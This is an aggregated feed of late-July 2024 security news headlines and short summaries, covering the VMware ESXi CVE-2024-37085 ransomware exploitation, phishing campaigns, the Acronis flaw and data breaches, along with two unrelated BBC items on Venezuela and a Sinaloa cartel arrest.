          Ransomware operators have been leveraging CVE-2024-37085, an authentication bypass vulnerability affecting Active Directory domain-joined VMware ESXi hypervisors, to gain full administrative access to them and encrypt their file system. VMware owner Broadcom released a fix for CVE-2024-37085 on June 25, 2024, and credited Microsoft’s researchers for flagging it, but did not mention that the vulnerability – at that time, a zero-day – was under active exploitation. “ESXi is a bare-metal hypervisor … More

          The post VMware ESXi auth bypass zero-day exploited by ransomware operators (CVE-2024-37085) appeared first on Help Net Security.

          "

          Autosummary: Ransomware operators have been using custom Linux versions of the Akira, Black Basta, Babuk, Lockbit, and other encryptors to encrypt VMware ESXi virtual machines, but leveraging ESXi vulnerabilities such as CVE-2024-37085 means easy encryption of multiple virtual machines (VMs) in one fell swoop. "


          Cybercriminals Target Polish Businesses with Agent Tesla and Formbook Malware

          exploits ciber
          2024-07-30 https://thehackernews.com/2024/07/cybercriminals-target-polish-businesses.html
          Cybersecurity researchers have detailed widespread phishing campaigns targeting small and medium-sized businesses (SMBs) in Poland during May 2024 that led to the deployment of several malware families like Agent Tesla, Formbook, and Remcos RAT. Some of the other regions targeted by the campaigns include Italy and Romania, according to cybersecurity firm ESET. "Attackers used previously "

          Autosummary: Regardless of what malware is deployed, Agent Tesla, Formbook, and Remcos RAT come with capabilities to siphon sensitive information, allowing the threat actors to "prepare the ground for their next campaigns. "


          Cyber Threat Intelligence: Illuminating the Deep, Dark Cybercriminal Underground

          ciber
          2024-07-30 https://thehackernews.com/2024/07/cyber-threat-intelligence-illuminating.html
          Learn about critical threats that can impact your organization and the bad actors behind them from Cybersixgill’s threat experts. Each story shines a light on underground activities, the threat actors involved, and why you should care, along with what you can do to mitigate risk. The deep and dark web, otherwise known as the cybercriminal underground, is where malicious actors gather to "

          Autosummary: Because the dark web is a hub for cybercriminals to exchange tools, information, and services, dark web threat intelligence is crucial for companies, as it offers an uncensored view into the current cybercrime landscape and trends. "


          A crafty phishing campaign targets Microsoft OneDrive users

          financial
          2024-07-30 https://securityaffairs.com/166312/hacking/microsoft-onedrive-phishing.html
          Researchers detected a sophisticated phishing campaign targeting Microsoft OneDrive users to trick them into executing a PowerShell script. Over the past few weeks, the Trellix Advanced Research Center observed a sophisticated phishing campaign targeting Microsoft OneDrive users. Threat actors rely on social engineering tactics to trick users into executing a PowerShell script, which leads to […] "

          Autosummary: Subsequently, it downloads an archive file into this location, renames it, extracts its contents (“script.a3x” and “AutoIt3.exe”), and executes script.a3x using AutoIt3.exe. "


          DigiCert mass-revoking TLS certificates due to domain validation bug

          exploits
          2024-07-30 https://www.bleepingcomputer.com/news/security/digicert-mass-revoking-tls-certificates-due-to-domain-validation-bug/
          DigiCert is warning that it will be mass-revoking SSL/TLS certificates due to a bug in how the company verified if a customer owned or operated a domain and requires impacted customers to reissue certificates within 24 hours. [...] "

          Autosummary: DigiCert is one of the prominent certificate authorities (CAs) that provides SSL/TLS certificates, including Domain Validated (DV), Organization Validated (OV), and Extended Validation (EV) certificates. "


          Is your password policy working? Key cybersecurity KPIs to measure

          ciber
          2024-07-30 https://www.bleepingcomputer.com/news/security/is-your-password-policy-working-key-cybersecurity-kpis-to-measure/
          Are your password policies having a positive impact on the cybersecurity posture of your org? Learn more from Specops Software about how to align password policies with wider cybersecurity KPIs. [...] "

          Autosummary: Specops Password Auditor is a free read-only auditing tool that helps IT teams proactively identify password vulnerabilities in their organization’s Active Directory. Tracking how often users are resetting their passwords can help identify weak spots in your security system or faulty authentication protocols. Regular scans of your Active Directory with an auditing tool should show a reduction or complete elimination of end user accounts with no password, expired passwords, or identical passwords to other users. "


          SideWinder phishing campaign targets maritime facilities in multiple countries

          financial
          2024-07-30 https://securityaffairs.com/166325/breaking-news/sidewinder-phishing-campaign-maritime-facilities.html
The APT group SideWinder launched a new espionage campaign targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. SideWinder (also known as Razor Tiger, Rattlesnake, and T-APT-04) has been active since at least 2012; the group mainly targeted Police, Military, Maritime, and the Naval forces of Central Asian countries. In the 2022 […] "

Autosummary: SideWinder (also known as Razor Tiger, Rattlesnake, and T-APT-04) has been active since at least 2012; the group mainly targeted Police, Military, Maritime, and the Naval forces of Central Asian countries. In the 2022 attacks, the threat actors also targeted departments of Foreign Affairs, Scientific and Defence organisations, Aviation, IT industry, and Legal firms. "


          Dark Angels ransomware extorts record-breaking $75 million ransom

          exploits ransomware
          2024-07-30 https://www.bleepingcomputer.com/news/security/dark-angels-ransomware-extorts-record-breaking-75-million-ransom/
          A Fortune 50 company paid a record-breaking $75 million ransom payment to the Dark Angels ransomware gang, according to a report by Zscaler ThreatLabz. [...] "

Autosummary: "In early 2024, ThreatLabz uncovered a victim who paid Dark Angels $75 million, higher than any publicly known amount— an achievement that's bound to attract the interest of other attackers looking to replicate such success by adopting their key tactics (which we describe below)," reads the 2024 Zscaler Ransomware Report. "


          CISA warns of VMware ESXi bug exploited in ransomware attacks

          exploits ransomware
          2024-07-30 https://www.bleepingcomputer.com/news/security/cisa-warns-of-vmware-esxi-bug-exploited-in-ransomware-attacks/
          CISA has ordered U.S. Federal Civilian Executive Branch (FCEB) agencies to secure their servers against a VMware ESXi authentication bypass vulnerability exploited in ransomware attacks. [...] "

          Autosummary: "


          Black Basta ransomware switches to more evasive custom malware

          exploits ransomware
          2024-07-30 https://www.bleepingcomputer.com/news/security/black-basta-ransomware-switches-to-more-evasive-custom-malware/
          The Black Basta ransomware gang has shown resilience and an ability to adapt to a constantly shifting space, using new custom tools and tactics to evade detection and spread throughout a network. [...] "

          Autosummary: Moreover, Mandiant, who tracks the threat actors as UNC4393, has identified new malware and tools used in Black Basta intrusions, demonstrating evolution and resilience. "


          Google Chrome adds app-bound encryption to block infostealer malware

          exploits
          2024-07-30 https://www.bleepingcomputer.com/news/security/google-chrome-adds-app-bound-encryption-to-block-infostealer-malware/
          Google Chrome has added app-bound encryption for better cookie protection on Windows systems and improved defenses against information-stealing malware attacks. [...] "

          Autosummary: "


          Columbus investigates whether data was stolen in ransomware attack

          exploits ransomware
          2024-07-30 https://www.bleepingcomputer.com/news/security/columbus-investigates-whether-data-was-stolen-in-ransomware-attack/
The City of Columbus, Ohio, says it's investigating whether personal data was stolen in a ransomware attack on July 18, 2024 that disrupted the City's services. [...] "

Autosummary: The mayor's statement published on June 23, 2024. Email services and IT connectivity between public agencies were rendered unavailable, but the 911 and 311 lines and all public safety and emergency services continued to operate as usual. "


          Dark Angels ransomware receives record-breaking $75 million ransom

          exploits ransomware
          2024-07-30 https://www.bleepingcomputer.com/news/security/dark-angels-ransomware-receives-record-breaking-75-million-ransom/
          A Fortune 50 company paid a record-breaking $75 million ransom payment to the Dark Angels ransomware gang, according to a report by Zscaler ThreatLabz. [...] "

Autosummary: "In early 2024, ThreatLabz uncovered a victim who paid Dark Angels $75 million, higher than any publicly known amount— an achievement that's bound to attract the interest of other attackers looking to replicate such success by adopting their key tactics (which we describe below)," reads the 2024 Zscaler Ransomware Report. "


          CISA adds VMware ESXi bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-07-30 https://securityaffairs.com/166362/security/cisa-vmware-esxi-bug-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a VMware ESXi bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an authentication bypass VMware ESXi vulnerability, tracked as CVE-2024-37085 (CVSS score of 6.8), to its Known Exploited Vulnerabilities (KEV) catalog. This week, Microsoft warned that multiple ransomware gangs are […] "

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an authentication bypass VMware ESXi vulnerability, tracked as CVE-2024-37085 (CVSS score of 6.8), to its Known Exploited Vulnerabilities (KEV) catalog. "


          Phishing targeting Polish SMBs continues via ModiLoader

          financial ransomware
          2024-07-30 https://www.welivesecurity.com/en/eset-research/phishing-targeting-polish-smbs-continues-modiloader/
          ESET researchers detected multiple, widespread phishing campaigns targeting SMBs in Poland during May 2024, distributing various malware families "

Autosummary: Example of a phishing email containing ModiLoader in the attachment. In other campaigns, email messages were more verbose, such as the phishing email in Figure 3, which can be translated as follows: Hi, We are looking to purchase your product for our client. The final payload to be delivered and launched on the compromised machines varied; we’ve detected campaigns delivering: Formbook – information stealing malware discovered in 2016, Agent Tesla – a remote access trojan and information stealer, and Rescoms RAT – remote control and surveillance software, able to steal sensitive information. Chain of compromise of ModiLoader phishing campaigns in Poland during May 2024. Data exfiltration: three different malware families were used as a final payload: Agent Tesla, Rescoms, and Formbook. Overview: even though the phishing campaigns have been ongoing throughout the first half of 2024, this blogpost focuses just on May 2024, as this was an eventful month. In the other case, when a RAR archive was sent as an attachment, the content was a heavily obfuscated batch script, with the same name as the archive and with the .cmd file extension. Key points of this blogpost: ESET detected nine notable ModiLoader phishing campaigns during May 2024 in Poland, Romania, and Italy. A more verbose phishing email example containing ModiLoader in the attachment. As in the phishing campaigns of H2 2023, attackers impersonated existing companies and their employees as the technique of choice to increase campaign success rate. "


          The cost of cybersecurity burnout: Impact on performance and well-being

          ciber
          2024-07-29 https://www.helpnetsecurity.com/2024/07/29/cybersecurity-professionals-stress-burnout-statistics/

This article includes excerpts from recent reports we covered, providing statistics and insights into the levels of stress and burnout experienced by cybersecurity professionals. Most cybersecurity pros took time off due to mental health issues (Hack The Box | Building a firewall against cybersecurity burnout | June 2024): 74% of cybersecurity professionals globally say that they have taken time off due to work-related mental well-being problems, with staff reporting taking an average of 3.4 sick … More

          The post The cost of cybersecurity burnout: Impact on performance and well-being appeared first on Help Net Security.

          "

Autosummary: Proofpoint | 2024 Voice of the CISO | May 2024: In 2024, 53% of CISOs admitted to burnout compared to 60% last year, while 66% feel they face excessive expectations, a steady increase from 61% last year and 49% in 2022. "


          "Stargazer Goblin" Creates 3,000 Fake GitHub Accounts for Malware Spread

          exploits
          2024-07-29 https://thehackernews.com/2024/07/stargazer-goblin-creates-3000-fake.html
A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware and has netted them $100,000 in illicit profits over the past year. The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to "

Autosummary: Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy. It's however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation: "Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository. When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will be visible to everyone." "


          Gh0st RAT Trojan Targets Chinese Windows Users via Fake Chrome Site

          exploits
          2024-07-29 https://thehackernews.com/2024/07/gh0st-rat-trojan-targets-chinese.html
The remote access trojan known as Gh0st RAT has been observed being delivered by an "evasive dropper" called Gh0stGambit as part of a drive-by download scheme targeting Chinese-speaking Windows users. These infections stem from a fake website ("chrome-web[.]com") serving malicious installer packages masquerading as Google's Chrome browser, indicating that users searching for the software on the "

          Autosummary: "Gh0st RAT is written in C++ and has many features, including terminating processes, removing files, capturing audio and screenshots, remote command execution, keylogging, data exfiltration, hiding registry, files, and directories via the rootkit capabilities, and many more," eSentire said. "


          Belarus-linked APT Ghostwriter targeted Ukraine with PicassoLoader malware

          exploits
          2024-07-29 https://securityaffairs.com/166265/intelligence/belarus-apt-ghostwriter-targeted-ukraine.html
          Belarus-linked APT group GhostWriter targeted Ukrainian organizations with a malware family known as PicassoLoader, used to deliver various malicious payloads. The Ukrainian Government’s Computer Emergency Response Team (CERT-UA) reported a surge in activity associated with the APT group UAC-0057 (aka GhostWriter) group between July 12 and 18, 2024. Threat actors distributed documents containing macros designed […] "

          Autosummary: "


          HealthEquity says data breach impacts 4.3 million people

          financial
          2024-07-29 https://www.bleepingcomputer.com/news/security/healthequity-says-data-breach-impacts-43-million-people/
          HSA provider HealthEquity has determined that a cybersecurity incident disclosed earlier this month has compromised the information of 4,300,000 people. [...] "

          Autosummary: "


          Proofpoint settings exploited to send millions of phishing emails daily

          financial exploits
          2024-07-29 https://www.bleepingcomputer.com/news/security/proofpoint-settings-exploited-to-send-millions-of-phishing-emails-daily/
A massive phishing campaign dubbed "EchoSpoofing" exploited a security gap in Proofpoint's email protection service to dispatch millions of spoofed emails impersonating big entities like Disney, Nike, IBM, and Coca-Cola, to target Fortune 100 companies. [...] "

Autosummary: Sample email from the campaign. Source: Guardio Labs. Proofpoint tightens security: in a coordinated report from Proofpoint, the company says they had been monitoring this campaign since March. With the technical IOCs shared by Guardio, Proofpoint was further able to mitigate these attacks and provide new settings and advice on how to prevent them in the future. "


          Critical Acronis Cyber Infrastructure vulnerability exploited in the wild (CVE-2023-45249)

          exploits
          2024-07-29 https://www.helpnetsecurity.com/2024/07/29/cve-2023-45249/

CVE-2023-45249, a critical vulnerability affecting older versions of Acronis Cyber Infrastructure, is being exploited by attackers. About Acronis Cyber Infrastructure: Acronis is a privately held Swiss cybersecurity and data protection technology company. Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. Businesses and service providers use it for data storage, backup storage, creating and managing virtual machines and software-defined networks, running cloud-native applications in production environments, and more. … More

          The post Critical Acronis Cyber Infrastructure vulnerability exploited in the wild (CVE-2023-45249) appeared first on Help Net Security.

          "

Autosummary: Version 5.0 before build 5.0.1-61; version 5.1 before build 5.1.1-71; version 5.2 before build 5.2.1-69; version 5.3 before build 5.3.1-53; and version 5.4 before build 5.4.4-132. Upgrade ASAP. "


          Proofpoint Email Routing Flaw Exploited to Send Millions of Spoofed Phishing Emails

          financial exploits
          2024-07-29 https://thehackernews.com/2024/07/proofpoint-email-routing-flaw-exploited.html
An unknown threat actor has been linked to a massive scam campaign that exploited an email routing misconfiguration in email security vendor Proofpoint's defenses to send millions of messages spoofing various popular companies like Best Buy, IBM, Nike, and Walt Disney, among others. "These emails echoed from official Proofpoint email relays with authenticated SPF and DKIM signatures, thus "

          Autosummary: The technique, which involves the threat actor sending the messages from an SMTP server on a virtual private server (VPS), is notable for the fact that it complies with authentication and security measures such as SPF and DKIM, which are short for Sender Policy Framework and DomainKeys Identified Mail, respectively, and refer to authentication methods that are designed to prevent attackers from imitating a legitimate domain. "The spammer used a rotating series of leased virtual private servers (VPS) from several providers, using many different IP addresses to initiate quick bursts of thousands of messages at a time from their SMTP servers, sent to Microsoft 365 to be relayed to Proofpoint-hosted customer servers," Proofpoint said. "


          Acronis Cyber Infrastructure bug actively exploited in the wild

          exploits
          2024-07-29 https://securityaffairs.com/166277/hacking/acronis-cyber-infrastructure-bug-exploited.html
          Acronis warns of a critical vulnerability in its Acronis Cyber Infrastructure (ACI) solution that is being actively exploited in the wild. Acronis is warning of a critical vulnerability, tracked as CVE-2023-45249 (CVSS score of 9.8), in its Acronis Cyber Infrastructure (ACI) solution that is being actively exploited in the wild. ACI is a comprehensive IT […] "

Autosummary: Affected products include: Acronis Cyber Infrastructure (ACI) before build 5.4.4-132; Acronis Cyber Infrastructure (ACI) before build 5.0.1-61; Acronis Cyber Infrastructure (ACI) before build 5.1.1-71; Acronis Cyber Infrastructure (ACI) before build 5.2.1-69; Acronis Cyber Infrastructure (ACI) before build 5.3.1-53. The company addressed the vulnerability with the release of ACI versions 5.4 update 4.2, 5.2 update 1.3, 5.3 update 1.3, 5.0 update 1.4, and 5.1 update 1.2. "


          Microsoft: Ransomware gangs exploit VMware ESXi auth bypass in attacks

          exploits ransomware
          2024-07-29 https://www.bleepingcomputer.com/news/microsoft/microsoft-ransomware-gangs-exploit-vmware-esxi-auth-bypass-in-attacks/
          Microsoft warned today that ransomware gangs are actively exploiting a VMware ESXi authentication bypass vulnerability in attacks. [...] "

          Autosummary: "A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ("ESXi Admins" by default) after it was deleted from AD," Broadcom explains. "


          Critical Flaw in Acronis Cyber Infrastructure Exploited in the Wild

          exploits
          2024-07-29 https://thehackernews.com/2024/07/critical-flaw-in-acronis-cyber.html
          Cybersecurity company Acronis is warning that a now-patched critical security flaw impacting its Cyber Infrastructure (ACI) product has been exploited in the wild. The vulnerability, tracked as CVE-2023-45249 (CVSS score: 9.8), concerns a case of remote code execution that stems from the use of default passwords. The flaw impacts the following versions of Acronis Cyber Infrastructure (ACI) - & "

          Autosummary: "


          Ransomware gangs exploit recently patched VMware ESXi bug CVE-2024-37085

          exploits
          2024-07-29 https://securityaffairs.com/166295/cyber-crime/ransomware-gangs-exploit-cve-2024-37085-vmware-esxi.html
Microsoft warns that ransomware gangs are exploiting the recently patched CVE-2024-37085 flaw in VMware ESXi. Microsoft researchers warned that multiple ransomware gangs are exploiting the recently patched vulnerability CVE-2024-37085 (CVSS score of 6.8) in VMware ESXi. “Microsoft researchers have uncovered a vulnerability in ESXi hypervisors being exploited by several ransomware operators to obtain full […] "

Autosummary: Ransomware gangs exploit recently patched VMware ESXi bug CVE-2024-37085, by Pierluigi Paganini, July 29, 2024. Microsoft warns that ransomware gangs are exploiting the recently patched CVE-2024-37085 flaw in VMware ESXi. "


          Beware of fake AI tools masking very real malware threats

          exploits
          2024-07-29 https://www.welivesecurity.com/en/cybersecurity/beware-fake-ai-tools-masking-very-real-malware-threat/
          Ever attuned to the latest trends, cybercriminals distribute malicious tools that pose as ChatGPT, Midjourney and other generative AI assistants "

Autosummary: As we explained here, we fall for these tricks because: we’re in a hurry, especially if we’re viewing the content on our mobile device; they’re good storytellers, and are increasingly fluent, using (ironically) GenAI to tell their stories seamlessly in multiple languages; we love to get something for nothing, even if it’s too good to be true; the bad guys are good at sharing knowledge on what works and what doesn’t, while we’re less good at seeking out or taking advice; we’re hardwired to respect authority, or at least the legitimacy of an offer, as long as it’s “officially” branded. When it comes to GenAI, malware-slingers are getting increasingly sophisticated. They could use access to steal your most sensitive personal and financial information, or turn your machine into a “zombie” computer to launch attacks on others; they could use your personal information for identity fraud, which can be extremely distressing, not to mention expensive, for the victim; they could use financial and identity details to obtain new credit lines in your name, or to steal crypto assets and access and drain bank accounts; they could even use your work credentials to launch an attack on your employer, or a partner/supplier organization. It could include credentials for your online accounts, such as work log-ins, or stored credit cards, session cookies (to bypass multifactor authentication), assets stored in crypto wallets, data streams from instant messaging apps, and much more. Be wary of clicking on digital ads: digital ads, especially on social media platforms like Facebook, can be a common vector for distributing malicious apps. It’s, therefore, key to understand how they work, learn to spot the warning signs, and take precautions so that your identity and finances aren’t at risk. "


          Week in review: CrowdStrike-triggered outage insights, recovery, and measuring cybersecurity ROI

          ciber
          2024-07-28 https://www.helpnetsecurity.com/2024/07/28/week-in-review-crowdstrike-triggered-outage-insights-recovery-and-measuring-cybersecurity-roi/

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft releases tool to speed up recovery of systems borked by CrowdStrike update By now, most people are aware of – or have been personally affected by – the largest IT outage the world has ever witnessed, courtesy of a defective update for Crowdstrike Falcon Sensors that threw Windows hosts into a blue-screen-of-death (BSOD) loop. Vulnerability in Telegram app for … More

          The post Week in review: CrowdStrike-triggered outage insights, recovery, and measuring cybersecurity ROI appeared first on Help Net Security.

          "

Autosummary: Confidential AI: Enabling secure processing of sensitive data In this Help Net Security interview, Anand Pashupathy, VP & GM, Security Software & Services Division at Intel, explains how Intel’s approach to confidential computing, particularly at the silicon level, enhances data protection for AI applications and how collaborations with technology leaders like Google Cloud, Microsoft, and Nvidia contribute to the security of AI solutions. "


Venezuela's economy runs on oil - and music

          industry
          2024-07-28 https://www.bbc.com/news/articles/c51y9r0jgxno
Venezuela's battered economy is one of the key battlegrounds in Sunday's presidential election. "

Autosummary: Unfortunately, however, those policies have done little or nothing to tackle the economy's underlying structural problems - chiefly, its historic dependence on oil, to the detriment of other sectors. But at the same time, they neglected to invest in maintaining the level of oil production, which has plummeted in recent years - partly, but not solely, as a result of US sanctions. "


          Security Affairs Malware Newsletter – Round 4

          exploits
          2024-07-28 https://securityaffairs.com/166237/breaking-news/security-affairs-malware-newsletter-round-4.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Play Ransomware Group’s New Linux Variant Targets ESXi, Shows Ties With Prolific Puma; Fake Browser Updates Lead to BOINC Volunteer Computing Software; Impact of FrostyGoop ICS Malware on Connected OT Systems; A Novel Static Analysis […] "

          Autosummary: "


          French authorities launch disinfection operation to eradicate PlugX malware from infected hosts

          exploits
          2024-07-28 https://securityaffairs.com/166213/cyber-crime/plugx-malware-disinfection-operation.html
          French authorities and Europol are conducting a “disinfection operation” targeting hosts compromised by the PlugX malware. The French authorities, with the help of Europol, have launched on July 18, 2024, a “disinfection operation” to clean hosts infected with the PlugX malware. Following a report by the cybersecurity firm Sekoia.io, the Paris Public Prosecutor’s Office launched […] "

Autosummary: The PlugX malware is a remote access trojan (RAT) that has been used since 2008 by multiple China-linked APT groups, including Mustang Panda, Winnti, and APT41. The RAT uses DLL side-loading to load its own malicious DLL when a digitally signed software application, such as the x32dbg debugging tool (x32dbg.exe), is executed. "


          French Authorities Launch Operation to Remove PlugX Malware from Infected Systems

          exploits
          2024-07-27 https://thehackernews.com/2024/07/french-authorities-launch-operation-to.html
French judicial authorities, in collaboration with Europol, have launched a so-called "disinfection operation" to rid compromised hosts of a known malware called PlugX. The Paris Prosecutor's Office, Parquet de Paris, said the initiative was launched on July 18 and that it's expected to continue for "several months." It further said around a hundred victims located in France, Malta, Portugal, "

Autosummary: French judicial authorities, in collaboration with Europol, have launched a so-called "disinfection operation" to rid compromised hosts of a known malware called PlugX. The Paris Prosecutor's Office, Parquet de Paris, said the initiative was launched on July 18 and that it's expected to continue for "several months." "


          Ukraine’s cyber operation shut down the ATM services of major Russian banks

          financial rusia-ucrania
          2024-07-27 https://securityaffairs.com/166214/cyber-warfare-2/atm-services-russian-banks-hacked.html
Ukraine launched a massive cyber operation that shut down the ATM services of the biggest Russian banks on July 27, reported the Kyiv Post. Ukraine has launched a massive cyberattack against ATMs of Russian banks; the cyber operation began on July 23. “This is an opportune moment to fully implement the Kremlin’s long-desired ‘import substitution’ […] "

          Autosummary: The list of hacked Russian banks includes Dom.RF, VTB Bank, Alfa-Bank, Sberbank, Raiffeisen Bank, RSHB Bank, Rosbank, Gazprombank, Tinkoff Bank and iBank. "


Leader of Mexico's Sinaloa drug cartel arrested in Texas

          latam
          2024-07-26 https://www.bbc.com/news/articles/c4ng4g31x1wo
          El Mayo co-founded the notorious Sinaloa crime syndicate with El Chapo, who is currently jailed in the US. "

Autosummary: Photo (DEA/ICE): Ismael "El Mayo" Zambada (left) and Joaquin Guzman Lopez. One of the world's biggest drug lords, Ismael "El Mayo" Zambada, leader of Mexico's Sinaloa cartel, has been arrested by US federal agents in El Paso, Texas. "


          AI-generated deepfake attacks force companies to reassess cybersecurity

          ciber
          2024-07-26 https://www.helpnetsecurity.com/2024/07/26/deepfake-response-plans/

          As AI-generated deepfake attacks and identity fraud become more prevalent, companies are developing response plans to address these threats, according to GetApp. In fact, 73% of US respondents report that their organization has developed a deepfake response plan. This concern stems from the growing sophistication of AI-driven impersonation attacks that can undermine traditional security measures like biometric authentication, which were previously considered highly secure but are now being called into question. Companies are developing deepfake … More

          The post AI-generated deepfake attacks force companies to reassess cybersecurity appeared first on Help Net Security.

          "

Autosummary: Companies are developing deepfake response plans. Also, much like phishing attack preparation, it appears that companies are looking to run simulations of attacks to increase preparedness, as a majority of respondents work in companies where this is already implemented. "


          Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining

          ciber
          2024-07-26 https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html
Cybersecurity researchers are sounding the alarm over an ongoing campaign that's leveraging internet-exposed Selenium Grid services for illicit cryptocurrency mining. Cloud security company Wiz is tracking the activity under the name SeleniumGreed. The campaign, which is targeting older versions of Selenium (3.141.59 and prior), is believed to be underway since at least April 2023. "Unbeknownst to most "

          Autosummary: "Unbeknownst to most users, Selenium WebDriver API enables full interaction with the machine itself, including reading and downloading files, and running remote commands," Wiz researchers Avigayil Mechtinger, Gili Tikochinski, and Dor Laska said. "


          CrowdStrike Warns of New Phishing Scam Targeting German Customers

          financial
          2024-07-26 https://thehackernews.com/2024/07/crowdstrike-warns-of-new-phishing-scam.html
          CrowdStrike is alerting about an unfamiliar threat actor attempting to capitalize on the Falcon Sensor update fiasco to distribute dubious installers targeting German customers as part of a highly targeted campaign. The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter "

          Autosummary: A ZIP file ("CrowdStrike Falcon.zip") that contains a Python-based information stealer tracked as Connecio that collects system information, external IP address, and data from various web browsers, and exfiltrates them to SMTP accounts listed on a Pastebin dead-drop URL. "


          Terrorist Activity is Accelerating in Cyberspace – Risk Precursor to Summer Olympics and Elections

          industry
          2024-07-26 https://securityaffairs.com/166179/breaking-news/terrorist-activity-alarm-terrorist-attacks.html
Terrorist groups are increasingly using cyberspace and digital communication channels to plan and execute attacks. Yesterday, Federal Bureau of Investigation (FBI) Director Christopher Wray expressed growing concerns over the potential for a coordinated foreign terrorist attack in the United States. During his testimony to the House Oversight Committee, Mr. Wray cited the ISIS-K attack on […] "

          Autosummary: According to experts, one of the key issues is tracking high-risk individuals who may misuse financial services, such as banks, e-commerce platforms, and payment networks, to engage in illegal activities, including money laundering and terrorism financing. "


          Offensive AI: The Sine Qua Non of Cybersecurity

          ciber
          2024-07-26 https://thehackernews.com/2024/07/offensive-ai-sine-qua-non-of.html
"Peace is the virtue of civilization. War is its crime. Yet it is often in the furnace of war that the sharpest tools of peace are forged." - Victor Hugo. In 1971, an unsettling message started appearing on several computers that comprised ARPANET, the precursor to what we now know as the Internet. The message, which read "I'm the Creeper: catch me if you can." was the output of a program named "

          Autosummary: Plato"s adage, "Necessity is the mother of invention," is an apt characterization of cybersecurity today, where new AI-driven threats drive the innovation of more advanced security controls.While unconfirmed, it is believed that Ray Thomlinson, famously known for inventing email, developed Reaper, a program designed to remove Creeper from Infected Machines. "


          U.S. DoJ Indicts North Korean Hacker for Ransomware Attacks on Hospitals

          exploits ransomware
          2024-07-26 https://thehackernews.com/2024/07/us-doj-indicts-north-korean-hacker-for.html
          The U.S. Department of Justice (DoJ) on Thursday unsealed an indictment against a North Korean military intelligence operative for allegedly carrying out ransomware attacks against healthcare facilities in the country and funneling the payments to orchestrate additional intrusions into defense, technology, and government entities across the world. "Rim Jong Hyok and his co-conspirators deployed

          Autosummary: A Go-based backdoor that can run an arbitrary file, list the contents of a directory, download a file, take screenshots, and launch a shell to execute arbitrary commands; Dora RAT, a "simple malware strain" with support for reverse shell and file download/upload capabilities. "They have evolved from targeting South Korean financial institutions with disruptive attacks to targeting U.S. healthcare with ransomware, known as Maui, although not at the same scale as other Russian-speaking cybercrime groups," Alex Rose, director of threat research and government partnerships at Secureworks Counter Threat Unit, said.


          BIND updates fix four high-severity DoS bugs in the DNS software suite

          exploits
          2024-07-26 https://securityaffairs.com/166190/security/bind-updates-high-severity-dos-bugs.html
          The Internet Systems Consortium (ISC) released BIND security updates that fix several remotely exploitable DoS bugs in the DNS software suite. An attacker can exploit these vulnerabilities to disrupt DNS services. ISC addressed four high-severity vulnerabilities […]

          Autosummary: The vulnerability impacts BIND 9 versions 9.0.0 through 9.11.37, 9.16.0 through 9.16.50, 9.18.0 through 9.18.27, 9.19.0 through 9.19.24, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.49-S1, and 9.18.11-S1 through 9.18.27-S1. A performance issue in BIND 9, tracked as CVE-2024-1737, can occur when resolver caches or authoritative zone databases contain many resource records (RRs) for the same hostname.


          Russian ransomware gangs account for 69% of all ransom proceeds

          exploits ransomware rusia-ucrania
          2024-07-26 https://www.bleepingcomputer.com/news/security/russian-ransomware-gangs-account-for-69-percent-of-all-ransom-proceeds/
          Russian-speaking threat actors accounted for at least 69% of all crypto proceeds linked to ransomware throughout the previous year, exceeding $500,000,000. [...]

          Autosummary: In 2023, the largest players in this space included LockBit, Black Basta, ALPHV/BlackCat, Cl0p, PLAY, and Akira, all run by Russian-speaking threat actors.


          This AI-Powered Cybercrime Service Bundles Phishing Kits with Malicious Android Apps

          financial
          2024-07-26 https://thehackernews.com/2024/07/spanish-hackers-bundle-phishing-kits.html
          A Spanish-speaking cybercrime group named GXC Team has been observed bundling phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to the next level. Singaporean cybersecurity company Group-IB, which has been tracking the e-crime actor since January 2023, described the crimeware solution as a "sophisticated AI-powered phishing-as-a-service platform"

          Autosummary: Targets of the campaign include users of Spanish financial institutions, as well as tax and governmental services, e-commerce, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil.


          Crypto exchange Gemini discloses third-party data breach

          financial
          2024-07-26 https://www.bleepingcomputer.com/news/security/crypto-exchange-gemini-discloses-third-party-data-breach/
          Cryptocurrency exchange Gemini is warning it suffered a data breach incident caused by a cyberattack at its Automated Clearing House (ACH) service provider, whose name was not disclosed. [...]



          Google fixes Chrome Password Manager bug that hides credentials

          exploits
          2024-07-26 https://www.bleepingcomputer.com/news/google/google-fixes-chrome-password-manager-bug-that-hides-credentials/
          Google has fixed a bug in Chrome's Password Manager that caused user credentials to disappear temporarily for more than 18 hours. [...]

          Autosummary: "While an interim workaround was provided during the incident, after the fix was fully rolled out, users are being advised to restart their Chrome browser to ensure that the fix takes effect," Google added.


          FBCS data breach impact now reaches 4.2 million people

          financial
          2024-07-26 https://www.bleepingcomputer.com/news/security/fbcs-data-breach-impact-now-reaches-42-million-people/
